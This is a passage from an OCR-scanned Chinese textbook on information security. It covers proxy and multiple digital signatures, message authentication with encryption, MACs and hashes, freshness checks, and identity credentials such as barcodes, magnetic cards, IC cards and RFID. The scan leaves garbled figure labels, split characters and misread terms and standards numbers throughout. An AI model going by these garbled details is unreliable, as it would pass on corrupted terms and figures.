得 出 的 签名 ,还 是 签名 本 身 是 伪造 的 。 否 认 协 议 由 两 遍 验 证 协议 组 成 ( 略 ) 。 

2. 多 重 数字 签名 

(1) 广播 多 重 数字 签名 方案 

首先 由 消息 的 发 送 者 将 待 签名 的 消息 同时 发 送 给 每 一 个 签名 者 进行 签名 ,然后 签名 者 
将 签名 的 消息 发 给 签名 消息 的 收集 者 ( 求 签 名 者 ) ,收集 者 将 签名 的 消息 整理 后 发 给 签名 的 
验证 者 ,最 后 由 签名 的 验证 者 验证 多 重 签名 的 有 效 性 。 

(2) 有 序 多 重 数字 签名 方案 

在 有 序 多 重 数字 签名 方案 中 ,消息 的 发 送 者 规定 了 消息 的 签名 顺序 ,并 按 此 顺序 将 待 签 
消息 依次 发 给 每 一 个 签名 者 ,除了 第 一 个 签名 者 外 ,任意 一 个 签名 者 在 签名 之 前 都 要 验证 上 
一 签名 者 的 签名 有 效 性 。 若 签名 无 效 , 则 拒绝 进一步 签名 ,终止 整个 签名 。 若 签名 有 效 , 则 
继续 签名 ,最 后 当 签 名 的 验证 者 收 到 签名 消息 后 ,验证 多 重 签名 的 有 效 性 。 

3. 代理 签名 (Proxy Signature) 

代理 签名 就 是 指定 某 人 来 代替 自己 签名 ,也 称 为 委托 签名 。 代 理 签 名 可 用 于 原始 签名 
者 有 特殊 情况 时 临时 指定 某 人 代替 自己 行使 签名 权利 。 

1) 代理 签名 的 特点 

(1) 可 区 分 性 。 代 理 签名 与 某 人 的 通常 签名 是 可 以 区 分 的 。 

(2) 不 可 伪造 性 。 只 有 原始 签名 者 和 指定 的 代理 签名 者 能 够 产生 有 效 的 代理 签名 。 

(3) 密 钥 的 依赖 性 。 代 理 签名 密 钥 依赖 于 原始 签名 人 的 秘密 密 钥 。 

(4) 可 验证 性 。 从 代理 签名 中 ,验证 者 能 够 相信 原始 的 签名 者 认同 了 这 份 签名 消息 。 

(5) 可 识别 性 。 原 始 签名 者 能 够 从 代理 签名 中 识别 出 代理 签名 者 的 身份 。 

(6) 不 可 抵赖 性 。 代 理 签名 者 不 能 否认 他 创立 的 且 被 认可 的 代理 签名 。 

(7) 可 注销 性 。 如 果 原 始 签 名 者 希望 代理 签名 人 只 能 在 一 定时 间 内 拥有 生成 代理 签名 
的 能 力 , 那 么 必须 能 让 代理 签名 人 的 代理 签名 密 钥 在 指定 的 时 间 内 失去 作用 。 

2) 代理 签名 的 分 类 

代理 签名 可 以 分 为 完全 授权 (Full Delegation) .部 分 授权 (Partial Delegation) ,许可 证 
授权 (Delegation By Warrant) 。 

(1) 完全 授权 。 全 部 的 秘密 参数 都 交 给 代理 者 ,此 时 可 区 分 性 将 不 复 存在 。 

(2) 部 分 授权 。 用 秘密 参数 ;, 计 算出 另外 一 个 参数 o, 把 o 交 给 代理 者 (要 求 从 so 不 可 
能 导出 *) ,代理 者 秘密 保存 o, 用 o 对 信息 mm 签名 。 部 分 签名 方式 又 分 为 两 类 : 不 保护 代理 
者 方式 和 保护 代理 者 方式 。 

不 保护 代理 者 方式 是 原始 签名 者 和 代理 签名 者 都 可 以 产生 合法 的 代理 签名 。 保 护 代理 
者 方式 是 仅仅 代理 者 可 以 产生 合法 的 代理 签名 ,而 原始 的 签名 者 和 其 他 人 都 不 可 能 产生 合 
法 的 代理 签名 。 
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(3) 许可 证 授权 。 通 过 发 放 许可 证 的 方式 ,将 自己 的 签名 权利 授予 代理 签名 者 。 可 分 
为 两 种 方式 : Delegate-proxy 方 式 和 Bearer-proxy 方 式 。 

Delegate-proxy 方式 是 原始 签名 者 用 自己 的 私 钥 按 普通 签名 方式 签署 一 个 文件 给 代理 
者 ,声明 该 人 作为 自己 签名 的 代理 者 。Bearer-proxy 方 式 是 许可 证 包括 消息 和 原始 签名 , 签 
名 者 用 自己 的 私 钥 按 普通 方式 完成 的 原始 签名 ,而 消息 中 包含 一 个 全 新 的 公 钥 ,对 应 的 私 钥 
交 给 代理 者 保存 并 用 其 进行 代理 签名 。 


4.4 消息 认证 


消息 认证 是 一 种 过 程 , 它 使 得 通信 的 接收 方 能 够 验证 所 收 到 的 报 文 ( 发 送 者 和 报 文 内 
容 ,发 送 时 间 、 序 列 等 ) 在 传输 的 过 程 中 没有 被 假冒 伪造 和 算 改 , 即 保证 信息 的 完整 性 和 真 
实 性 ,也 即 消 息 有 效 性 。 

消息 认证 的 目的 在 于 如 何 让 报 文 接收 端 来 鉴别 报 文 的 真 伪 , 消 息 认证 的 内 容 应 包括 证 
实 消息 报 文 的 源 和 宿 ;消息 报 文 内 容 是 否 曾 受 到 算 改 ;消息 报 文 的 序号 和 时 间 栏 。 

消息 认证 只 在 相应 通信 的 双方 之 间 进行 ,而 不 允许 第 三 者 进行 上 述 认 证 。 认 证 不 一 定 
是 实时 的 。 使 用 认证 函数 对 消息 进行 变换 ,生成 消息 认证 的 标识 符 , 并 附加 在 消息 上 传送 ， 
以 标识 待 认证 (或 使 用 ) 的 消息 。 

消息 认证 的 函数 有 三 类 : 消息 加 密 函 数 ,分 为 对 称 密 钥 和 公 钥 密 钥 ,包括 加 密 和 签名 ; 
消息 认证 码 (MAC) ;Hash 函数 。 


4.4.1 消息 的 内 容 认证 


消息 内 容 认 证 属于 内 容 完整 性 认证 ,是 消息 认证 的 主要 方面 。 完 整 性 认证 不 需要 检验 
消息 报 文 的 制造 者 是 否 造假 。 消 息 报 文 的 制造 者 和 检验 者 利益 一 致 ,不 需要 互相 欺骗 和 
抵赖 。 

1. 消息 加 密 认证 

消息 的 加 密 认 证 可 以 保证 消息 的 保密 性 。 

1) 对 称 加 密 认 证 。 使 用 对 称 加 密 算法 ,要 求 消息 的 收发 双方 共享 一 个 对 称 密 钥 K。 发 


送 者 可 以 把 消息 加 密 后 传送 给 接收 者 ,也 可 "i ry 

以 把 加 密 后 的 消息 与 消息 明文 合并 传送 给 接 下 

收 者 ,由 接收 者 解密 后 验证 。 这 种 方法 是 解 Kk EW Kk 

密 的 正确 性 认证 了 加 密 消 息 的 完整 性 ,如 .一 “入 

图 4.16 所 示 。 J 2 
2) 内 部 错误 控制 的 对 称 加 密 认 证 。 加 密 | 

前 对 消息 生成 错误 控制 码 称 为 内 部 错误 控 Kk BM) 起 

制 。 根 据 明文 M 和 公开 的 函数 下 产生 错误 控 图 4.16 消息 的 对 称 加 密 认证 


制 码 FCS, 即 错误 检测 码 或 帧 校 验 序列 、 校 验 

和 。 把 M 和 FCS 合 在 一 起 用 对 称 密 钥 K 加 密 并 传输 。 接 收 者 用 K 把 密 文 解密 ,得 到 M 
和 FCS ,并 根据 得 到 的 M, 按 照 下 计算 ;比较 FCS 与 FCS' 是 否 相 等 ,相等 则 消息 完整 ,没有 
被 算 改 ,如 图 4.17 所 示 。 
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= 志 M On 
~(P) FcS 下 Dcs 较 


K Ec(MIFCS) 天 
图 4.17 消息 认证 的 内 部 错误 控制 


3) 外 部 错误 控制 的 对 称 加 密 认 证 。 与 内 部 错误 控制 的 对 称 为 加 密 认证 相 比 较 ,外 部 错 
误 控制 是 将 消息 明文 M 加 密 后 再 用 公开 的 函数 下 生成 错误 控制 码 ,接收 者 收 到 密 文 和 
FCS 后 , 先 对 密 文 计算 FCS, 比 较 是 否 相 等 ,相等 则 密 文 未 被 算 改 ;最 后 将 密 文 用 密 钥 K 解 
密 。 这 种 方法 保证 了 密 文 传输 的 完整 性 ,但 如 果 传 输 时 FCS 被 算 改 , 则 认证 困难 ,如 图 4. 18 
所 示 。 
K 


M © 国 . aoores Gr 
7 比较 大 
[ 


图 4.18 消息 认证 的 外 部 错误 控制 


4) 消息 的 公 钥 加 密 认证 。 从 加 密使 用 的 收发 方 的 不 同 公 钥 密 钥 加 密 来 看 ,分 公 钥 加 密 
和 私 钥 签名 两 种 。 

(1) 公 钥 加 密 认 证 。 将 要 传输 的 消息 M 用 接收 者 的 公 钥 加 密 ,并 与 明文 M 一 起 传送 给 
接收 者 ;接收 者 用 自己 的 私 钥 解密 密 文 并 与 明文 比较 来 认证 消息 的 完整 性 ,如 图 4. 19 所 示 。 


M 六 | AM 


4 1M B 
1 M 
Ku 有 un(A0) Krp 


图 4.19 消息 的 接收 公 钥 加 密 认证 


(2) 私 钥 签 名 认证 。 将 要 传输 的 消息 M 用 发 送 者 的 私 钥 加 密 , 并 与 明文 M 一 起 传送 给 
接收 者 ;接收 者 用 发 送 者 的 公 钥 解密 密 文 并 与 明文 比较 来 认证 消息 的 完整 性 ,如 图 4. 20 所 
示 , 由 于 只 有 A 有 用 于 产生 Err (M) 的 密 钥 ,因此 此 方法 提供 认证 。 这 种 方法 不 要 求 认证 


接收 者 是 谁 。 
‘加 一 5 于 本 4 
| 十 | 


Kra Erra(M) Ku 
图 4.20 消息 的 发 送 私 钥 签名 认证 


5) 消息 的 公 钥 加 密 与 签名 混合 认证 。 先 用 接收 方 公 钥 加 密 , 再 用 自己 的 私 钥 签 名 ,与 
密 文 合并 后 传送 给 接收 方 ;接收 方 用 发 送 者 的 公 钥 解密 验证 签名 ,得 到 的 密 文 与 接收 到 的 比 
较 , 相 同 则 用 自己 的 私 钥 解密 ,从 而 得 到 明文 。 一 次 通信 中 要 执行 4 次 复杂 的 公 钥 算法 ,还 
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可 以 变化 加 密 和 签名 顺序 ,得 到 不 同 的 混合 认证 方案 。 混 合 认 证 如 图 4. 21 所 示 。 


B 
M 一 
Kuw Ekuo(M) ' Kya ExraM) Kua 
Ekra(Ekut(M)) 
图 4.21 公 钥 的 加 密 签名 混合 认证 
2. 消息 认证 码 认证 


认证 码 是 在 消息 报 文中 加 入 一 个 “ 报 尾 ” 或 “报头 ”, 称 其 为 认证 码 (Authenticating 
Code，AC) 。 这 个 认证 码 是 通过 对 报 文 进行 的 某 种 运算 得 到 的 ,也 可 以 称 其 为 “ 校 验 和 ?”。 
它 与 报 文 内 容 密切 相关 , 报 文 内 容 正确 与 否 可 以 通过 这 个 认证 码 来 确定 。 

认证 码 由 发 方 计算 ,并 提供 给 收 方 检验 。 收 方 检验 时 ,首先 利用 约定 的 算法 对 脱 密 的 报 
文 进行 运算 ,得 到 一 个 认证 码 , 然 后 将 这 个 算出 来 的 认证 码 与 收 到 的 由 发 方 计算 的 认证 码 进 
行 比较 。 如 相等 ,就 认为 该 报 文 内 容 是 正确 的 ;如 不 等 ,那么 就 认为 该 报 文 在 传送 过 程 中 已 
被 改动 过 了 ,接收 方 就 可 以 拒绝 接收 或 报警 。 

(1) 消息 明文 的 认证 码 认 证 。 只 提供 消息 认证 ,不 提供 消息 的 保密 性 ,如 图 4. 22 所 示 。 
A 和 B 共 享 密 钥 开 ,A 计算 MAC=Ci (MD), 消息 明文 M 和 MAC 合并 一 起 发 送 到 B,B 对 收 
到 的 M 计算 MAC ,比较 两 个 MAC 是 否 相同 ;如 果 两 个 MAC 相等 , 则 接收 方 B 可 以 相信 消 
息 未 被 修改 ,因为 如 果 攻 击 者 改变 了 消息 ,由 于 不 知道 ,无 法 生成 正确 的 MAC。 接 收 方 B 
可 以 相信 消息 的 确 来 自 确定 的 发 送 方 A, 因 为 其 他 人 不 能 生成 和 原始 消息 相应 的 MAC。 


| MAC 

加 a 
. 比较 

MAC 


图 4.22 消息 明文 的 认证 码 认 证 


(2) 消息 明文 的 认证 码 加 密 认 证 。 与 明文 有 关 的 认证 ,提供 消息 的 认证 和 保密 性 ,如 
图 4.23 所 示 。A 和 B 共 享 K; 和 K; ,Ki 用 于 生成 消息 认证 码 MAC,K。 用 于 加 密 ;发 送 者 
A 首先 用 Ki 生成 MAC 后 与 明文 M 合并 ,再 用 KK, 加 密 后 传送 给 接收 者 B;B 收 到 密 文 后 
先 用 K, 解密 ,再 取 明 文 用 KK, 生成 MAC ,与 接收 到 的 MAC 比较 ,相同 则 认证 通过 。 


Se - 国 L Og 


Cx(M) B 
图 4.23 消息 明文 的 认证 码 加 密 认证 


A 


(3) 消息 密 文 的 认证 码 认证 。 与 密 文 有 关 的 认证 ,提供 消息 认证 和 保密 性 ,如 图 4. 24 
所 示 。A 和 B 共享 K 和 K,,K, 用 于 生成 消息 密 文 的 认证 码 MAC,K, 用 于 加 密 消息 明 
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文 ;发 送 者 A 首先 用 K, 加 密 消息 M 生成 密 文 ,再 用 KK, 生成 密 文 的 MAC 后 与 密 文 合并 ， 
并 传送 给 接收 者 B;B 收 到 后 先 对 密 文 用 Ki 生成 MAC ,与 接收 到 的 MAC 比较 ,相同 则 认 
证 通过 ,用 K; 解密 收 到 的 密 文 得 到 明文 M。 


图 4.24 消息 密 文 的 认证 码 认证 


3. 消息 的 Hash 码 认 证 

将 带 密 钥 的 认证 码 换 成 Hash 码 ,也 可 以 进行 相应 的 消息 认证 。 

(1) 带 Hash 明文 的 加 密 认 证 。 消 息 明文 与 其 Hash 值 合并 后 用 K 加 密 , 需 要 收发 双 
方 共享 密 钥 K ,提供 消息 完整 性 ,保密 性 保护 和 认证 ,如 图 4.25 (a) 所 示 。 

(2) 加 密 Hash 的 明文 认证 。 消 息 明 文 与 其 Hash 值 的 加 密 值 合并 后 传送 ,也 需要 收发 
双方 共享 密 钥 ,提供 消息 完整 性 保护 和 认证 ,如 图 4.25(b) 所 示 。 


Source A Destination B 
-| D M ~(D) 
ExMIAM] x Compare, 
天 
HM) 


(a) A、B 共 享 密 钥 K， 提 供 机 密 性 ， 同 时 对 HM) 加 密 保护 来 提供 认证 


0 本 -O- 一 


Kl 
bss 天 Compare 
Er[H(M)] 


(b) A、B 共 享 密 钥 K， 仅 对 认证 信息 提供 加 密 保护 ， 明 文 不 提供 机 密 性 


M ml | 一 (从 ) 
Ka Compare 
@ ©) ExrralH(OM)] | 


(9) A 使 用 私 钥 加 密 哈 希 摘要 一 一 签名 ，B 用 A 的 公 钥 解 密 认证 ， 明 文 不 提供 机 密 性 


Source A Destination B 


M 
Exc[MlExal HN] 


天 

ExralH(M)] 

(d) A、B 共 享 密 钥 K， 提 供 机 密 性 ， 同 时 A 对 AH(M) 签 名 并 加 密 保护 来 提供 认证 
图 4.25 了 哈 希 函数 消息 认证 系列 用 法 


Compare 
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四 A 5 


Compare 
G ) @ H(MIS) 


(e) A、B 共 享 随机 数 $， 仅 提供 认证 信息 ， 明 文 不 提供 机 密 性 


: WV-® De:0n0n 
« x 图 cm 
sD)"(H) EMIAMIS) MNS 


(f) A、B 共 享 随机 数 S 和 密 钥 K， 提 供认 证 和 机 密 性 
图 4.25( 续 ) 


(3) 带 签 名 Hash 的 明文 认证 。 消 息 明文 的 Hash 值 用 发 送 方 的 私 钥 签名 ,再 与 明文 合 
并 后 传送 ,是 基于 公 钥 体制 ,提供 消息 完整 性 保护 和 认证 ,Hash 值 被 加 密 保 护 , 只 有 发 送 者 
才能 产生 签名 ,如 图 4.25 (c) 所 示 。 

(4) 带 签名 Hash 的 密 文 认证 。 与 (3) 相 比 , 对 传送 信息 进行 加 密 , 双 方 需 共享 对 称 密 
钥 K ,提供 了 消息 的 保密 性 ,如 图 4.25(d) 所 示 。 

(5) 带 共享 信息 Hash 的 明文 认证 。 消 息 明文 M 与 收发 双方 的 共享 信息 S 合并 后 再 生 
成 Hash 值 ,再 与 明文 合并 后 发 送 。 共 享 信息 S 可 以 是 双方 已 知 的 或 同步 的 ,如 序列 号 .时 
截 等 ,提供 消息 的 鲜 活性 认证 ,如 图 4.25(e) 所 示 。 

(6) 带 共享 信息 Hash 的 密 文 认证 。 与 (5) 相 比 ,对 传送 信息 进行 加 密 ,双方 需 共享 对 
称 密 钥 K ,提供 了 消息 的 保密 性 ,如 图 4.25(f) 所 示 。 
4.4.2 消息 的 其 他 特性 认证 

1. 消息 的 源 和 宿 认证 

消息 源 和 宿 的 认证 属于 消息 的 主体 身份 验证 ,将 只 有 该 主体 拥有 和 了 解 的 秘密 作为 消 
息 的 主体 身份 标识 ,如 口令 、 密 钥 等 。 常 用 的 认证 标识 如 下 : 

(1) 加 密 密 钥 。 由 收 方 和 发 方 共享 某 个 秘密 的 数据 加 密 密 钥 ,并 利用 这 个 密 钥 来 验证 
发 方 身份 。 

(2) 通行 字 。 由 通信 双方 事先 约定 好 各 自 所 使 用 的 通行 字 。 在 A 发 给 B 的 所 有 报 文 
中 都 要 含有 A 的 通行 字 , 同 样 ,由 B 发 往 A 的 所 有 报 文 也 都 要 含有 B 的 通行 字 。 

(3) 消息 的 主体 特征 。 不 可 伪造 的 主体 特征 ,如 消息 收 方 或 发 方 的 IP 地 址 和 通信 端口 
(也 称 为 站 点 认证 ) ,如果 可 伪造 将 存在 认证 无 效 风险 。 

2. 消息 报 文 的 时 间 性 认证 (消息 新 鲜 性 ) 

发 送 者 A 将 当前 时 间 Ts 加 入 到 消息 M 中 ,接收 者 B 收 到 消息 后 ,根据 得 到 的 TA。 和 
本 地 时 间 进 行 比较 ,如 果 比 较 结果 所 显示 的 时 差 足够 小 ,那么 就 认为 M 是 新 鲜 的 。A 和 B 
的 系统 须 进 行 时 间 同 步 的 维护 。 

如 果 时 变量 Z 是 收 方 和 发 方 预先 约定 的 ,那么 用 Z 作 初始 化 向 量 对 发 送 的 报 文 进 行 加 
密 , 就 可 以 建立 起 报 文 传送 的 顺序 ;如 果 时 变量 工 是 收 方 和 发 方 预先 约定 的 ,那么 只 要 在 每 
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份 报 文中 加 入 工 形成 时 戳 , 就 可 以 建立 起 报 文 传送 的 顺序 。 

3. 消息 报 文 的 序列 号 认证 

序列 号 的 用 法 与 时 戳 的 用 法 相似 ,使 用 序列 号 时 ,A 和 B 维护 某 个 同步 的 序列 号 ,序列 
号 应 该 以 一 种 B 知道 的 方式 增加 ,从 而 确定 消息 的 新 鲜 性 。 

缺点 : 每 一 个 可 能 的 通信 方 都 必须 维护 一 系列 的 状态 信息 ,而 认证 协议 一 般 是 无 状态 
的 ,有 状态 的 协议 在 恶劣 的 环境 中 不 能 很 好 地 工作 ;管理 序列 号 在 通信 出 错时 会 很 难处 理 。 
一 般 不 主张 使 用 序列 号 。 

4. 消息 认证 示例 一 一 电脑 彩票 的 防伪 技术 

彩票 中 心 为 了 防止 电脑 彩票 的 伪造 ,检查 兑奖 的 电脑 彩票 是 否 是 自己 发 行 的 方法 : 

(1) 选择 一 个 分 组 密码 算法 和 一 个 认证 密 钥 , 将 它们 存 于 售票 机 内 ; 

(2) 将 电脑 彩票 上 的 重要 信息 ,如 彩票 期 号 ,彩票 号 码 ,彩票 股 量 和 售票 单位 代号 等 重 
要 信息 按 某 个 约定 的 规则 作为 彩票 资料 明文 ; 

(3) 对 彩票 资料 明文 扩展 一 个 校 验 码 分 组 后 ,利用 认证 密 钥 和 分 组 密码 算法 对 之 加 密 ， 
并 将 得 到 的 最 后 一 个 分 组 密 文 作为 认证 码 打 印 于 彩票 上 面 。 

认证 过 程 : 执行 第 (3) 步 ,并 将 计算 出 的 认证 码 与 彩票 上 的 认证 码 比较 ,二 者 一 致 时 判 
定 该 彩票 是 真 彩票 ,否则 判定 该 彩票 是 假 彩 票 。 


4.5 身份 认证 


在 竞争 激烈 同时 存在 斗争 的 现实 社会 中 ,身份 欺诈 是 不 可 避免 的 ,因此 常常 需要 证 明 个 
人 的 身份 。 传 统 的 身份 认证 一 般 是 通过 检验 “ 物 " 的 有 效 性 来 标识 和 确认 持 该 物 者 的 身份 。 
“ 物 ? 可 以 为 徽章 .工作 证 ,标牌 ( 卡 )、 信 用 卡 、 身 份 证 和 护照 等 , 卡 上 含有 个 人 照片 ,并 有 权威 
机 构 签 章 。 而 人 的 生物 特征 可 以 将 他 与 其 他 个 体 区 别 开 来 ,比如 DNA 信息 .虹膜 和 指 
纹 等 。 

身份 认证 是 信息 安全 理论 的 重要 组 成 部 分 。 正 确 识别 信息 系统 中 的 主体 (用 户 、 节 点 或 
终端 等 ) 身 份 十 分 重要 。 例 如 银行 系统 的 自动 取款 机 (ATM) ,用 户 可 以 直接 从 取款 机 中 提 
取现 款 ,但 ATM 首先 要 确认 用 户 的 身份 ,否则 恶意 欺诈 会 给 银行 和 用 户 造成 损失 。 


4.5.1 身份 认证 概念 


身份 认证 (Identity Authentication) 是 指 通 过 特定 的 协议 和 算法 来 证 实 主体 的 真实 身 
份 与 其 所 声称 的 身份 是 否 相符 的 过 程 。 身 份 认证 又 称 作 识 别 (Identification) ,实体 认证 
(Entity Authentication) .身份 验证 (Identity Verification) 等 ,是 系统 核实 (验证 ) 主 体 ( 用 
户 ) 提 供 或 出 示 的 身份 标识 是 否 有 效 的 过 程 ,决定 主体 (用 户 ) 对 请 求 的 资源 的 存储 权 和 使 用 
权 。 认 证 活动 又 称 为 鉴别 ,是 证 明 、 判 定 和 识别 个 体 的 过 程 。 

身份 认证 通过 标识 身份 的 三 种 基本 要 素 或 其 组 合 来 完成 认证 : 

(1) 用 户 所 知道 的 某 个 秘密 信息 。 如 用 户口 令 、PIN 码 、 在 挑战 -响应 协议 中 已 被 证 实 
的 秘密 或 私 钥 。 

(2) 用 户 所 持 有 的 某 个 秘密 事物 (硬件 )。 即 用 户 必须 持 有 合法 的 随身 携带 的 物理 介 
质 , 如 钥匙 、 磁 卡 、 智 能 卡 、 令 牌 或 用 户 所 申请 领取 的 公 钥 证 书 。 
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(3) 用 户 所 具有 的 某 些 生物 特征 或 属性 。 如 人 脸 .指纹 .声音 、. 手 形 . 步 态 .DNA 图 案 、 
视网膜 扫描 等 。 

身份 认证 系统 架构 包含 三 项 主要 组 成 元 件 : 

(1) 认证 服务 器 (Authentication Server) 。 负 责 进 行使 用 者 身份 认证 的 工作 ,服务 器 上 
存放 使 用 者 的 私有 密 钥 、 认 证 方式 及 其 他 使 用 者 认证 的 信息 。 

(2) 认证 系统 客户 端 软件 (Authentication Client Software)。 认 证 系统 客户 端 通常 都 
是 需要 进行 登录 (Login) 的 设备 或 系统 ,在 这 些 设备 及 系统 中 必须 具备 可 以 与 认证 服务 器 协 
同 运 作 的 认证 协定 。 

(3) 认证 设备 (Authenticator)。 认 证 设备 是 使 用 者 用 来 产生 或 计算 密码 的 软 硬 件 
设备 。 

身份 认证 的 必要 性 : 

(1) 控制 资源 存 取 , 根 据 用 户 的 身份 来 限制 对 不 同 资源 的 访问 。 

(2) 建立 认证 密 钥 , 如 会 话 密 钥 的 建立 ,从 而 建立 通信 双方 或 多 方 的 保密 通信 。 

(3) 计 费 ,通过 用 户 的 身份 和 使 用 资源 的 时 间 进 行 计 费 ,如 移动 应 用 中 的 蜂 窜 电话。 

身份 认证 与 消息 认证 的 区 别 在 于 : 身份 认证 一 般 都 是 实时 的 ,而 消息 认证 本 身 不 提供 
时 间 性 ; 另 一 方面 ,身份 认证 通常 证 实 身份 本 身 ,而 消息 认证 除了 认证 消息 的 合法 性 和 完整 
性 外 ,还 要 知道 消息 的 含义 。 


4.5.2 身份 标识 


身份 标识 是 指 系 统 对 其 中 的 主体 给 出 的 可 区 分 标识 符号 ,用 于 认证 主体 的 合法 性 和 权 
限 。 现 实 中 的 身份 标识 如 征 章 、 令 牌 (如 古代 兵 符 .军队 口令 ). 牌 卡 和 钥匙 等 ,直接 标识 主体 
的 某 种 权限 或 合法 性 。 现 实 中 带 身份 信息 的 标识 如 身份 证 户口 本 等 。 

1. 身份 标识 的 数字 化 

信息 系统 中 的 主体 标识 都 是 系统 给 出 的 系统 中 唯一 的 数字 化 符号 串 , 用 以 标识 主体 身 
份 。 如 系统 生成 或 给 定 的 数字 账号 或 ID .生物 特征 (如 人 脸 .指纹 和 声 纹 等 ) 数 字 化 串 。 

2. 身份 标识 的 物化 

用 实物 记录 身份 信息 ,如 条 形 码 ,磁卡 和 RFID 射频 卡 (IC 卡 、ID 卡 ) 等 ,是 身份 认证 的 
物理 基础 。 需 通过 特殊 设备 读 取 转 换 为 数字 标识 ,传送 给 信息 系统 识别 。 

(1) 条 形 码 。 条 形 码 是 一 种 将 信息 制作 成 按 一 定 的 编码 规则 排列 的 多 个 黑白 条 状 或 点 
状 , 用 以 表达 一 组 信息 的 图 形 标识 符 。 条 形 码 由 相应 的 扫描 设备 把 信息 扫描 输入 到 计算 机 
中 。 条 形 码 分 为 一 维 条 码 和 二 维 条 码 。 

一 维 条 码 能 表示 的 字符 集 不 过 10 个 数字 、26 个 英文 字母 及 一 些 特殊 字符 ,条 码 字 符 集 
最 多 能 表示 的 字符 个 数 为 128 个 ASCII 字符 。 二 维 条 码 是 在 二 维 空间 水 平和 竖 直 方向 存 
储 信息 的 条 形 码 。 优 点 是 信息 容量 大 , 译 码 可 靠 性 高 , 纠 错 能 力 强 , 制 作成 本 低 ,保密 与 防伪 
性 能 好 。 例 如 ,2009 年 12 月 10 日 ,铁道 部 对 火车 票 进行 了 升级 改版 。 新 版 火车 票 明显 的 
变化 是 车 票 下 方 的 一 维 条 码 变 成 了 二 维 条 码 ,火车 票 的 防伪 能 力 增强 了 ,如 图 4. 26 所 示 。 

(2) 磁卡 (Magnetic Card) 。 一 种 卡片 状 的 磁性 记录 介质 ,利用 磁性 载体 记录 字符 与 数 
字 信息 ,用 来 识别 身份 或 其 他 用 途 。 按 照 使 用 基 材 的 不 同 , 磁 卡 可 分 为 PET 卡 .PVC 卡 和 
纸 卡 三 种 ;根据 磁 层 构造 的 不 同 ,又 可 分 为 磁 条 卡 和 全 涂 磁卡 两 种 。 一 面 印 刷 有 说 明 提示 性 
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(a) 一 维 条 码 (b) 二 维 条 码 
图 4. 26 火车 票 从 一 维 条 码 升级 到 二 维 条 码 


信息 ,如 插 卡 方向 ; 另 一 面 则 有 磁 层 或 磁 条 , 磁 条 中 所 包含 的 信息 一 般 比 条 形 码 大 ,具有 三 个 
独立 的 磁道 (TKi ,TK, ,TK;) 以 记录 有 关 信 息 数 据 。 通 过 粘 合 或 热合 与 塑料 或 纸 牢固 地 整 
合 在 一 起 形成 磁卡 。TK, 最 多 可 写 79 个 字母 或 字符 ,TK, 最 多 可 写 40 个 字符 ,TKs 最 多 
可 写 107 个 字符 。 磁 条 用 树脂 粘 合剂 严密 地 粘 合 在 诸如 纸 或 塑料 这 样 的 非 磁 基 片 媒介 上 ， 
如 图 4. 27 所 示 。 


图 4.27 磁卡 与 磁卡 刷卡 器 


(3) IC 卡 (Integrated Circuit Card) 。 也 叫 作 智能 卡 (Smart Card), 1970 年 由 法 国人 
Roland Moreno 发 明 ,是 将 一 个 微 电 子 芯片 嵌入 符合 ISO 7816 标准 的 卡 基 中 ,做 成 卡片 形 
式 ,通过 写 在 集成 电路 芯片 上 的 数据 来 进行 识别 。IC 卡 读 写 器 是 IC 卡 与 应 用 系统 间 的 桥 
梁 。 接 触 式 IC 卡 的 多 个 金属 触 点 为 卡 芯 片 与 外 界 的 信息 传输 媒介 ,成 本 低 ,实施 相对 简便 ， 
如 电话 卡 。 非 接触 式 IC 卡 又 称 为 射频 卡 ,采用 射频 技术 与 IC 卡 的 读 卡 器 进行 通信 ,不 用 触 
点 ,而 是 借助 无 线 收发 传送 信息 ,如 交通 乘 车 卡 、 健 康 卡 。 主 要 用 于 公交 、 轮 渡 、 地 铁 .门禁 管 
理 、 身 份 证 明和 电子 钱包 等 ,如 图 4. 28 所 示 。 


图 4.28 IC 卡 
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CPU 智能 卡 在 集成 电路 中 具有 微 计算 机 CPU 和 存储 器 ,具有 暂时 或 永久 的 数据 存储 
能 力 , 同 时 还 具有 用 于 识别 和 响应 外 部 提供 的 信息 和 芯片 本 身 判定 路 线 和 指令 执行 的 逻辑 
处 理 功能 。 接 触 式 IC 卡 的 国际 标准 是 ISO/VIEC 7816 ,已 经 成 熟 : 非 接触 式 IC 卡 的 国际 标 
准 是 ISO/IEC 1800 ISOVIEC 14443 和 ISO/IEC 15693 。 

(4) RFID(Radio Frequency Identification)。 即 射频 识别 ,俗称 电子 标签 ,主要 用 于 各 
种 物品 非 接触 式 的 自动 识别 ,具有 弱 计 算 能 力 , 是 物 联网 的 重要 支持 技术 ,也 是 当前 系统 标 
识 和 认证 主体 的 重要 技术 。 

RFID 的 系统 组 成 包括 电子 标签 . 读 写 器 (阅读 器 ) 以 及 作为 服务 器 的 计算 机 。 其 中 , 电 
子 标 签 中 包含 RFID 芯片 和 天 线 ,如 图 4.29 所 示 。 


图 4.29 RFID 标签 产品 


基本 原理 是 利用 射频 信号 和 空间 耦合 (电感 或 电磁 耦合 ) 或 雷达 反射 的 传输 特性 ,实现 
对 被 识别 物体 的 自动 识别 。 一 种 简单 的 无 线 系统 ,由 一 个 询问 器 (阅读 器 ) 和 很 多 应 答 器 ( 标 
签 ) 组 成 ,如 图 4. 30 所 示 。 


Emer 2 二: 丰台 部 件 (包括 
上 3 线圈 、 天 线 ) 


RS232, USB 等 


(a) RFID 系 统 组 成 (b) 标签 基 架 
图 4.30 ”RFID 系统 组 成 


RFID 标签 (Tag) 是 由 耦合 元 件 .芯片 及 微型 天 线 组 成 ,每 个 标签 内 部 存 有 唯一 的 电子 
编码 ,附着 在 物体 上 ,用 来 标识 目标 对 象 。 标 签 进入 RFID 阅读 器 扫描 场 以 后 ,接收 到 阅读 
器 发 出 的 射频 信号 ,凭借 感应 电流 获得 的 能 量 发 送出 存储 在 芯片 中 的 电子 编码 (被 动 式 标 
签 ) ,或 者 主动 发 送 某 一 频率 的 信号 (主动 式 标 签 ) 。 与 条 形 码 、 磁 卡 .IC 卡 相 比较 ,RFID 卡 
在 信息 量 . 读 写 性 能 . 读 取 方 式 . 智 能 化 、 抗 干扰 能 力 、 使 用 寿命 方面 都 具备 不 可 替代 的 优势 ， 
但 制造 成 本 比 条 形 码 和 IC 卡 稍 高 。 

RFID 频率 是 RFID 系统 的 一 个 很 重要 的 参数 指标 , 它 决 定 了 工作 原理 .通信 距离 .设备 
成 本 、 天 线形 状 和 应 用 领域 等 因素 。RFID 典型 的 工作 频率 有 125kHz、 133kHz、 
